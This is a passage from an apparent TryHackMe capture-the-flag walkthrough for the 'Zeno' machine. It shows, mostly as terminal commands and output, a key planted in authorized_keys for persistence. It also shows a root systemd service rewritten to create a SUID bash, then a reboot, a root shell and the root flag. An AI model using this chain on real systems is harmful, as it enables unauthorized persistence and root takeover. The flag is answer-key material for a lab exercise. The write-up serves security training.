|o. . .o |
|. o .o |
|o+oo. |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop]
└─$ chmod 400 key_edward
┌──(kali㉿kali)-[~/Desktop]
└─$ cat key_edward.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali
[edward@zeno ~]$ cd .ssh
cd .ssh
[edward@zeno .ssh]$ ls -la
ls -la
total 4
drwxr-xr-x. 2 root root 29 Sep 21 2021 .
drwxr-xr-x. 3 root root 127 Sep 21 2021 ..
-rw-------. 1 edward edward 1 Sep 21 2021 authorized_keys
[edward@zeno .ssh]$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali" >> authorized_keys
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4qNBLG1/sXhApn96+W5lxxcauro3Jd6M0FgGFfFnEd kali@kali" >> authorized_keys
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i key_edward edward@zeno.thm
Last login: Thu Aug 21 10:01:16 2025
[edward@zeno ~]$ id
uid=1000(edward) gid=1000(edward) groups=1000(edward) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Next, we edit /etc/systemd/system/zeno-monitoring.service so that when the service starts, it creates a copy of /bin/bash and sets the SUID permission bit on it.
[edward@zeno system]$ cat << EOF > /etc/systemd/system/zeno-monitoring.service
> [Unit]
> Description=Zeno monitoring
>
> [Service]
> Type=simple
> User=root
> ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/rootbash && chmod +s /home/edward/rootbash'
>
> [Install]
> WantedBy=multi-user.target
> EOF
[edward@zeno system]$ cat zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/rootbash && chmod +s /home/edward/rootbash'
[Install]
WantedBy=multi-user.target
[edward@zeno system]$ sudo /usr/sbin/reboot
Connection to zeno.thm closed by remote host.
Connection to zeno.thm closed.
Shell as root
We reboot the machine, wait a few minutes for the system to come back up, then run the bash binary we had the service create.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i key_edward edward@zeno.thm
Last login: Thu Aug 21 10:14:31 2025 from ip-10-17-21-52.ec2.internal
[edward@zeno ~]$ ls -la
total 964
drwxr-xr-x. 3 root root 143 Aug 21 10:19 .
drwxr-xr-x. 3 root root 20 Jul 26 2021 ..
lrwxrwxrwx. 1 root root 9 Jul 26 2021 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 root root 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 root root 231 Apr 1 2020 .bashrc
-rwsr-sr-x. 1 root root 964536 Aug 21 10:19 rootbash
drwxr-xr-x. 2 root root 29 Sep 21 2021 .ssh
-rw-r-----. 1 root edward 38 Jul 26 2021 user.txt
-rw-------. 1 root root 699 Jul 26 2021 .viminfo
[edward@zeno ~]$ ./rootbash -p
rootbash-4.2# id
uid=1000(edward) gid=1000(edward) euid=0(root) egid=0(root) groups=0(root),1000(edward) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
As a result, we have successfully escalated privileges and obtained root on the system.
root.txt
rootbash-4.2# cd /root
rootbash-4.2# ls -la
total 60
dr-xr-x---. 3 root root 274 Sep 21 2021 .
dr-xr-xr-x. 17 root root 224 Jun 8 2021 ..
-rw-------. 1 root root 1537 Jun 8 2021 anaconda-ks.cfg
-rw-------. 1 root root 10666 Sep 23 2021 .bash_history
lrwxrwxrwx. 1 root root 9 Jul 26 2021 bash_history -> /dev/null
-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc
-rw-------. 1 root root 1026 Sep 21 2021 .mysql_history
drwxr-----. 3 root root 19 Jul 26 2021 .pki
-rw-r--r--. 1 root root 38 Jul 26 2021 root.txt
-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rw-------. 1 root root 6363 Sep 21 2021 .viminfo
-rw-r--r--. 1 root root 1 Sep 21 2021 zeno-monitoring.log
-rwxr-xr-x. 1 root root 358 Sep 21 2021 zeno-monitoring.py
rootbash-4.2# cat root.txt
THM{b187ce4b85232599ca72708ebde71791}